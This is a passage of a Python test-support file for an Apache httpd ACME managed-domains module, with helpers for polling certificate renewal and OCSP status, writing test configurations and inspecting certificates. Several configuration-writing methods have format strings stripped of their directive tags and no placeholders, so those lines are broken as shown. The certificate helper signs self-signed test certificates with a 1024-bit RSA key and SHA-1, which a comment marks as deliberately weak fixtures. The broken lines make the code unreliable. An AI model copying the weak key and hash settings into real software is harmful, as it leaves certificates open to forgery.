return True\n\n @classmethod\n def is_renewing(cls, name, timeout=60):\n stat = TestEnv.get_certificate_status(name, timeout)\n return 'renewal' in stat\n\n @classmethod\n def await_renewal(cls, names, timeout=60):\n try_until = time.time() + timeout\n while len(names) > 0:\n if time.time() >= try_until:\n return False\n allChanged = True\n for name in names:\n md = TestEnv.get_md_status(name, timeout)\n if md == None:\n print(\"not managed by md: %s\" % (name))\n return False\n\n if 'renewal' in md:\n names.remove(name)\n\n if len(names) != 0:\n time.sleep(0.1)\n return True\n\n @classmethod\n def await_error(cls, domain, timeout=60):\n try_until = time.time() + timeout\n while True:\n if time.time() >= try_until:\n return False\n md = cls.get_md_status(domain)\n if md:\n if md['state'] == TestEnv.MD_S_ERROR:\n return md\n if 'renewal' in md and 'errors' in md['renewal'] and md['renewal']['errors'] > 0:\n return md\n time.sleep(0.1)\n\n @classmethod\n def check_file_permissions( cls, domain ):\n md = cls.a2md([ \"list\", domain ])['jout']['output'][0]\n assert md\n acct = md['ca']['account']\n assert acct\n cls.check_file_access( cls.path_store_json(), 0o600 )\n # domains\n cls.check_file_access( cls.store_domains(), 0o700 )\n cls.check_file_access( os.path.join( cls.store_domains(), domain ), 0o700 )\n cls.check_file_access( cls.store_domain_file( domain, 'privkey.pem' ), 0o600 )\n cls.check_file_access( cls.store_domain_file( domain, 'pubcert.pem' ), 0o600 )\n cls.check_file_access( cls.store_domain_file( domain, 'md.json' ), 0o600 )\n # archive\n cls.check_file_access( cls.store_archived_file( domain, 1, 'md.json' ), 0o600 )\n # accounts\n cls.check_file_access( os.path.join( cls.STORE_DIR, 'accounts' ), 0o755 )\n cls.check_file_access( os.path.join( cls.STORE_DIR, 'accounts', acct ), 0o755 )\n cls.check_file_access( cls.path_account( acct ), 0o644 )\n cls.check_file_access( cls.path_account_key( acct ), 0o644 )\n # staging\n cls.check_file_access( cls.store_stagings(), 0o755 )\n\n @classmethod\n def get_ocsp_status( cls, domain ):\n stat = {}\n r = TestEnv.run( [ \"openssl\", \"s_client\", \"-status\", \n \"-connect\", \"%s:%s\" % (TestEnv.HTTPD_HOST, TestEnv.HTTPS_PORT),\n \"-CAfile\", \"gen/ca.pem\", \n \"-servername\", domain,\n \"-showcerts\"\n ] )\n ocsp_regex = re.compile(r'OCSP response: +([^=\\n]+)\\n')\n matches = ocsp_regex.finditer(r[\"stdout\"])\n for m in matches:\n if m.group(1) != \"\":\n stat['ocsp'] = m.group(1)\n if not 'ocsp' in stat:\n ocsp_regex = re.compile(r'OCSP Response Status:\\s*(.+)')\n matches = ocsp_regex.finditer(r[\"stdout\"])\n for m in matches:\n if m.group(1) != \"\":\n stat['ocsp'] = m.group(1)\n verify_regex = re.compile(r'Verify return code:\\s*(.+)')\n matches = verify_regex.finditer(r[\"stdout\"])\n for m in matches:\n if m.group(1) != \"\":\n stat['verify'] = m.group(1)\n return stat\n\n @classmethod\n def await_ocsp_status( cls, domain, timeout=60 ):\n try_until = time.time() + timeout\n while True:\n if time.time() >= try_until:\n return False\n stat = cls.get_ocsp_status(domain)\n if 'ocsp' in stat and stat['ocsp'] != \"no response sent\":\n return stat\n time.sleep(0.1)\n \n# -----------------------------------------------\n# --\n# -- dynamic httpd configuration\n# --\n\nclass HttpdConf(object):\n # Utility class for creating Apache httpd test configurations\n\n def __init__(self, name=\"test.conf\", local=True, text=None):\n self.path = os.path.join(TestEnv.GEN_DIR, name)\n if os.path.isfile(self.path):\n os.remove(self.path)\n if local:\n 
open(self.path, \"a\").write((\n \"MDCertificateAuthority %s\\n\"\n \"MDCertificateAgreement %s\\n\") % \n (TestEnv.ACME_URL, 'accepted')\n );\n if text:\n open(self.path, \"a\").write(text + \"\\n\")\n\n def clear(self):\n if os.path.isfile(self.path):\n os.remove(self.path)\n\n def _add_line(self, line):\n open(self.path, \"a\").write(line + \"\\n\")\n\n def add_line(self, line):\n self._add_line(line)\n\n def add_drive_mode(self, mode):\n self._add_line(\" MDRenewMode %s\\n\" % mode)\n\n def add_renew_window(self, window):\n self._add_line(\" MDRenewWindow %s\\n\" % window)\n\n def add_private_key(self, keyType, keyParams):\n self._add_line(\" MDPrivateKeys %s %s\\n\" % (keyType, \" \".join(map(lambda p: str(p), keyParams))) )\n\n def add_admin(self, email):\n self._add_line(\" ServerAdmin mailto:%s\\n\\n\" % email)\n\n def add_md(self, domains):\n self._add_line(\" MDomain %s\\n\\n\" % \" \".join(domains))\n\n def start_md(self, domains):\n self._add_line(\" \\n\" % \" \".join(domains))\n \n def start_md2(self, domains):\n self._add_line(\" \\n\" % \" \".join(domains))\n\n def end_md(self):\n self._add_line(\" \\n\")\n\n def end_md2(self):\n self._add_line(\" \\n\")\n\n def add_must_staple(self, mode):\n self._add_line(\" MDMustStaple %s\\n\" % mode)\n\n def add_ca_challenges(self, type_list):\n self._add_line(\" MDCAChallenges %s\\n\" % \" \".join(type_list))\n\n def add_http_proxy(self, url):\n self._add_line(\" MDHttpProxy %s\\n\" % url)\n\n def add_require_ssl(self, mode):\n self._add_line(\" MDRequireHttps %s\\n\" % mode)\n\n def add_notify_cmd(self, cmd):\n self._add_line(\" MDNotifyCmd %s\\n\" % cmd)\n\n def add_message_cmd(self, cmd):\n self._add_line(\" MDMessageCmd %s\\n\" % cmd)\n\n def add_dns01_cmd(self, cmd):\n self._add_line(\" MDChallengeDns01 %s\\n\" % cmd)\n\n def add_vhost(self, domains, port=None, docRoot=\"htdocs\"):\n self.start_vhost(domains, port=port, docRoot=docRoot)\n self.end_vhost()\n\n def start_vhost(self, domains, port=None, docRoot=\"htdocs\"):\n if not isinstance(domains, list):\n domains = [domains]\n if not port:\n port = TestEnv.HTTPS_PORT \n f = open(self.path, \"a\") \n f.write(\"\\n\" % port)\n f.write(\" ServerName %s\\n\" % domains[0])\n for alias in domains[1:]:\n f.write(\" ServerAlias %s\\n\" % alias )\n f.write(\" DocumentRoot %s\\n\\n\" % docRoot)\n if TestEnv.HTTPS_PORT == port:\n f.write(\" SSLEngine on\\n\")\n \n def end_vhost(self):\n self._add_line(\"\\n\\n\")\n\n def install(self):\n TestEnv.install_test_conf(self.path)\n\n# -----------------------------------------------\n# --\n# -- certificate handling\n# --\n\nclass CertUtil(object):\n # Utility class for inspecting certificates in test cases\n # Uses PyOpenSSL: https://pyopenssl.org/en/stable/index.html\n\n @classmethod\n def create_self_signed_cert( cls, nameList, validDays, serial=1000, path=None ):\n domain = nameList[0]\n ddir = path if path else os.path.join(TestEnv.store_domains(), domain)\n if not os.path.exists(ddir):\n os.makedirs(ddir)\n\n cert_file = os.path.join(ddir, 'pubcert.pem')\n pkey_file = os.path.join(ddir, 'privkey.pem')\n # create a key pair\n if os.path.exists(pkey_file):\n key_buffer = open(pkey_file, 'rt').read()\n k = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, key_buffer)\n else:\n k = OpenSSL.crypto.PKey()\n k.generate_key(OpenSSL.crypto.TYPE_RSA, 1024)\n\n # create a self-signed cert\n cert = OpenSSL.crypto.X509()\n cert.get_subject().C = \"DE\"\n cert.get_subject().ST = \"NRW\"\n cert.get_subject().L = \"Muenster\"\n 
cert.get_subject().O = \"greenbytes GmbH\"\n        cert.get_subject().CN = domain\n        cert.set_serial_number(serial)\n        cert.gmtime_adj_notBefore(validDays[\"notBefore\"] * SEC_PER_DAY)\n        cert.gmtime_adj_notAfter(validDays[\"notAfter\"] * SEC_PER_DAY)\n        cert.set_issuer(cert.get_subject())\n\n        cert.add_extensions([OpenSSL.crypto.X509Extension(\n            b\"subjectAltName\", False, b\", \".join(map(lambda n: b\"DNS:\" + n.encode(), nameList))\n        )])\n        cert.set_pubkey(k)\n        # sha1 and a 1024 bit key are weak on purpose: these certs are test fixtures only\n        cert.sign(k, 'sha1')\n\n        with open(cert_file, \"wt\") as fd:\n            fd.write(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, cert).decode('utf-8'))\n        with open(pkey_file, \"wt\") as fd:\n            fd.write(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, k).decode('utf-8'))\n\n    @classmethod\n    def load_server_cert(cls, hostIP, hostPort, hostName):\n        ctx = OpenSSL.SSL.Context(OpenSSL.SSL.SSLv23_METHOD)\n        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n        connection = OpenSSL.SSL.Connection(ctx, s)\n        connection.connect((hostIP, int(hostPort)))\n        connection.setblocking(1)\n        connection.set_tlsext_host_name(hostName.encode('utf-8'))\n        connection.do_handshake()\n        peer_cert = connection.get_peer_certificate()\n        return CertUtil(None, cert=peer_cert)\n\n    def __init__(self, cert_path, cert=None):\n        self.cert = None\n        self.error = None\n        if cert_path is not None:\n            self.cert_path = cert_path\n            # load the certificate, trying PEM first, then DER\n            if cert_path.startswith(\"http\"):\n                cert_data = TestEnv.get_plain(cert_path, 1)\n            else:\n                cert_data = CertUtil._load_binary_file(cert_path)\n            for file_type in (OpenSSL.crypto.FILETYPE_PEM, OpenSSL.crypto.FILETYPE_ASN1):\n                try:\n                    self.cert = OpenSSL.crypto.load_certificate(file_type, cert_data)\n                    break\n                except Exception as error:\n                    self.error = error\n        if cert is not None:\n            self.cert = cert\n\n        if self.cert is None:\n            raise self.error\n\n    def get_issuer(self):\n        return self.cert.get_issuer()\n\n    def get_serial(self):\n        return (\"%lx\" % self.cert.get_serial_number()).upper()\n\n    def get_not_before(self):\n        tsp = self.cert.get_notBefore()\n        return self._parse_tsp(tsp)\n\n    def get_not_after(self):\n        tsp = self.cert.get_notAfter()\n        return self._parse_tsp(tsp)\n\n    def get_cn(self):\n        return self.cert.get_subject().CN\n\n    def get_key_length(self):\n        return self.cert.get_pubkey().bits()\n\n    def get_san_list(self):\n        text = OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_TEXT, self.cert).decode(\"utf-8\")\n        m = re.search(r\"X509v3 Subject Alternative Name:\\s*(.*)\", text)\n        sans_list = []\n        if m:\n            sans_list = m.group(1).split(\",\")\n\n        def _strip_prefix(s):\n            return s.split(\":\")[1] if s.strip().startswith(\"DNS:\") else s.strip()\n        return list(map(_strip_prefix, sans_list))\n\n    def get_must_staple(self):\n        text = OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_TEXT, self.cert).decode(\"utf-8\")\n        m = re.search(r\"1.3.6.1.5.5.7.1.24:\\s*\\n\\s*0....\", text)\n        if not m:\n            # newer openssl versions print this differently\n            m = re.search(r\"TLS Feature:\\s*\\n\\s*status_request\\s*\\n\", text)\n        return m is not None\n\n    @classmethod\n    def validate_privkey(cls, privkey_path, passphrase=None):\n        privkey_data = cls._load_binary_file(privkey_path)\n        if passphrase:\n            privkey = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, privkey_data, passphrase)\n        else:\n            privkey = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, privkey_data)\n        return privkey.check()\n\n    def validate_cert_matches_priv_key(self, privkey_path):\n        # Verifies that the private key and cert match.\n        privkey_data = CertUtil._load_binary_file(privkey_path)\n        
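# loading key and cert into one SSL context makes check_privatekey() raise on mismatch\n        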
privkey = OpenSSL.crypto.load_privatekey(OpenSSL.crypto.FILETYPE_PEM, privkey_data)\n        context = OpenSSL.SSL.Context(OpenSSL.SSL.SSLv23_METHOD)\n        context.use_privatekey(privkey)\n        context.use_certificate(self.cert)\n        context.check_privatekey()\n\n    # --------- _utils_ ---------\n\n    def astr(self, s):\n        return s.decode('utf-8')\n\n    def _parse_tsp(self, tsp):\n        # timestamps returned by PyOpenSSL are bytes, e.g. b'20190101120000Z'\n        # parse date and time part\n        s = (\"%s-%s-%s %s:%s:%s\" % (self.astr(tsp[0:4]), self.astr(tsp[4:6]), self.astr(tsp[6:8]),\n                                    self.astr(tsp[8:10]), self.astr(tsp[10:12]), self.astr(tsp[12:14])))\n        timestamp = datetime.strptime(s, '%Y-%m-%d %H:%M:%S')\n        # adjust timezone; determine the hour's sign first, then apply it to the minutes\n        tz_h, tz_m = 0, 0\n        m = re.match(r\"([+\\-]\\d{2})(\\d{2})\", self.astr(tsp[14:]))\n        if m:\n            tz_h = int(m.group(1))\n            tz_m = int(m.group(2)) if tz_h >= 0 else -int(m.group(2))\n        return timestamp.replace(tzinfo=self.FixedOffset(60 * tz_h + tz_m))\n\n    @classmethod\n    def _load_binary_file(cls, path):\n        with open(path, mode=\"rb\") as file:\n            return file.read()\n\n    class FixedOffset(tzinfo):\n        # fixed offset from UTC, in minutes\n\n        def __init__(self, offset):\n            self.__offset = timedelta(minutes=offset)\n\n        def utcoffset(self, dt):\n            return self.__offset\n\n        def tzname(self, dt):\n            return None\n\n        def dst(self, dt):\n            return timedelta(0)\n","sub_path":"test/test_base.py","file_name":"test_base.py","file_ext":"py","file_size_in_byte":35067,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}